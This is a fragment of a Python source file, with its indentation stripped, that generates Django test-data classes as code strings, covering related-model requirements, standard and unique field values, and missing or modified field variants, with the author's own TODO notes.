out_string += '\n'
# Create init requirements function
related_string = str()
related_string += "\t@staticmethod\n"
related_string += "\tdef init_requirements():\n"
had_requirement = False
# Iterate over the fields of the models.
for field, field_data in model_data['fields'].items():
# Check if the field has a related_model attribute.
# True - Create model for data.
if 'related_model' in field_data:
# Get the related models name and splitting at '.' from the reverse.
# NOTE: The string is split two from reverse to separate the string into
# app name, "model", model name. The word model is discarded, hence the use of 0 and 2 indexes.
related_model = field_data['related_model'].rsplit('.', 2)
# Check that the model starts with the prefix.
# True - Create model for data.
if related_model[0].startswith(settings.TEST_BUILDER_INPUT_APP_PREFIX):
had_requirement = True
required_name = related_model[2]
split_name = related_model[0].split('.', 1)[1]
if split_name not in self.current_app_name:
related_string += '\t\t# Import the required model and data\n'
related_string += '\t\tfrom {}.models import {}\n'\
.format(related_model[0], required_name)
related_string += '\t\tfrom {}.{}.test_data import {}TestData\n'\
.format(settings.TEST_BUILDER_OUTPUT_APP_PREFIX,
split_name,
required_name)
related_string += '\t\t# Check that requirements haven\'t already been created.\n'
related_string += '\t\t# True - Create necessary requirements.\n'
related_string += '\t\tif {}.objects.count() == 0:\n'.format(required_name)
related_string += '\t\t\t{}TestData.init_requirements()\n'.format(required_name)
related_string += '\t\t\tmodel = {0}.objects.create(**{0}TestData.get_data(\'standard\'))\n'.format(
required_name)
related_string += '\t\t\tmodel.save()\n'
related_string += '\t\t\tmodel = {0}.objects.create(**{0}TestData.get_data(\'unique\'))\n'.format(
required_name)
related_string += '\t\t\tmodel.save()\n'
related_string += '\n'
# Check that the model hasn't had any requirements.
# True - Add pass to the function body for init_requirements.
if not had_requirement:
related_string += '\t\tpass\n\n'
out_string += '{}'.format(related_string)
# Create required info
out_string += '\t# Store self information\n'
out_string += '\tmodel = {}\n'.format(plain_to_bumpy(model_name))
out_string += '\turl = \'{}\'\n'.format(model_data['url'])
out_string += '\n'
# Create the test data and add to out string.
out_string += self.generate_test_data(model_data=model_data)
return out_string
def generate_test_data(self, model_data):
out_string = str()
# Take reference to models field data.
fields = model_data['fields']
# Create standard formatted data and add to out string.
out_string += self.generate_formatted_data(field_data=fields)
out_string += '\n'
# Create unique formatted data and add to out string.
out_string += '\tunique = {\n'
# Iterate over fields creating the appropriate data for each.
for field, field_data in fields.items():
out_string += '\t\t\'{}\': {},\n' \
.format(field, self.generate_data(field_name=field, field_data=field_data, prefix='unique'))
out_string += '\t}\n\n'
# Iterate over fields for model creating the required variant pairs for each, outputting formatted data.
for field, field_data in fields.items():
variant_dict = self.generate_variant_data(field_name=field,
field_data=field_data)
# Iterate over variant dictionary creating the appropriately formatted data for out string.
for variant, variant_data in variant_dict.items():
out_string += self.generate_formatted_data(field_data=fields,
name=variant,
modified_field=variant_data)
out_string += '\n'
return out_string
def generate_formatted_data(self, field_data, name='standard', modified_field=None):
out_string = str()
# Create data header
out_string += '\t{} = {{\n'.format(name)
# Iterate over fields, creating appropriate data given passed parameters.
for field, attributes in field_data.items():
# Check that the current field is the desired modified field.
# True - Add variant line to out string.
# False - Add standard formatted line to outstring.
if modified_field is not None and field is modified_field['field']:
# Check that line isn't blank.
# True - Add line to out string.
if modified_field['line'] is not None:
out_string += modified_field['line']
else:
out_string += '\t\t\'{}\': {},\n' \
.format(field, self.generate_data(field_name=field, field_data=attributes))
out_string += '\t}\n'
return out_string
def generate_data(self, field_name, field_data, prefix='standard'):
out_string = str()
# This is a mess of code that needs to be refactored at sometime in the hopefully near future TODO:
if 'default' in field_data:
out_string += field_data['default']
elif 'choices' in field_data:
choice = field_data['choices'][0 if prefix == 'standard' else -1]
out_string += ('{}' if type(choice) == int else '\'{}\'').format(choice)
else:
field_type = field_data['type']
if field_type == 'BooleanField':
out_string += 'True' if prefix == 'standard' else 'False'
elif field_type == 'CharField':
char = '{}_char'.format(prefix)
out_string = '\'{}\''.format(char[:field_data['max_length']])
elif field_type == 'DateField':
out_string = '\'{}\''.format(
'2015-01-20' if prefix == 'standard' else '2015-02-20') # TODO: Figure out if this needs anything more complex
elif field_type == 'EmailField':
email = '{}_email'.format(prefix)
out_string = '\'{}\'@d.io'.format(
email[:-field_data['max_length']]) # TODO: Check that this is how this field actually works
elif field_type == 'IntegerField':
integer = '12345' if prefix == 'standard' else '54321'
if 'max_length' in field_data:
integer = integer[:field_data['max_length']]
out_string = '{}'.format(integer)
elif field_type == 'SlugField':
slug = '{}_slug'.format(prefix)
out_string = '\'{}\''.format(slug[:field_data['max_length']])
elif field_type == 'TextField':
text = '{}_text'.format(prefix)
out_string = '\'{}\''.format(text[:field_data['max_length']])
elif field_type == 'ForeignKey':
model_data = self.get_model_data_from_name(field_data['related_model'])
if model_data is not None:
out_string += '\'{}/{}/\''.format(model_data['url'], '1' if prefix == 'standard' else '2')
else: # TODO: This will occur when user is the related field
out_string += '\'\''
elif field_type == 'OneToOne':
model_data = self.get_model_data_from_name(field_data['related_model'])
if model_data is not None:
out_string += '\'{}/{}/\''.format(model_data['url'], '1' if prefix == 'standard' else '2')
else: # TODO: This will occur when user is the related field
out_string += '\'\''
elif field_type == 'ManyToMany':
model_data = self.get_model_data_from_name(field_data['related_model'])
if model_data is not None:
out_string += '\'{}/{}/\''.format(model_data['url'], '1' if prefix == 'standard' else '2')
else: # TODO: This will occur when user is the related field
out_string += '\'\''
else:
out_string = '\'default\''
return out_string
def generate_variant_data(self, field_name, field_data):
out_dict = dict()
out_dict.update({
'missing_{}'.format(field_name): {
'field': field_name,
'line': None
},
'modified_{}'.format(field_name): {
'field': field_name,
'line': '\t\t\'{}\': {},\n'.format(field_name, self.generate_data(field_name=field_name,
field_data=field_data,
prefix='modified'))
}
})
# TODO: Get individual model variants
return out_dict
| gpl-3.0 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.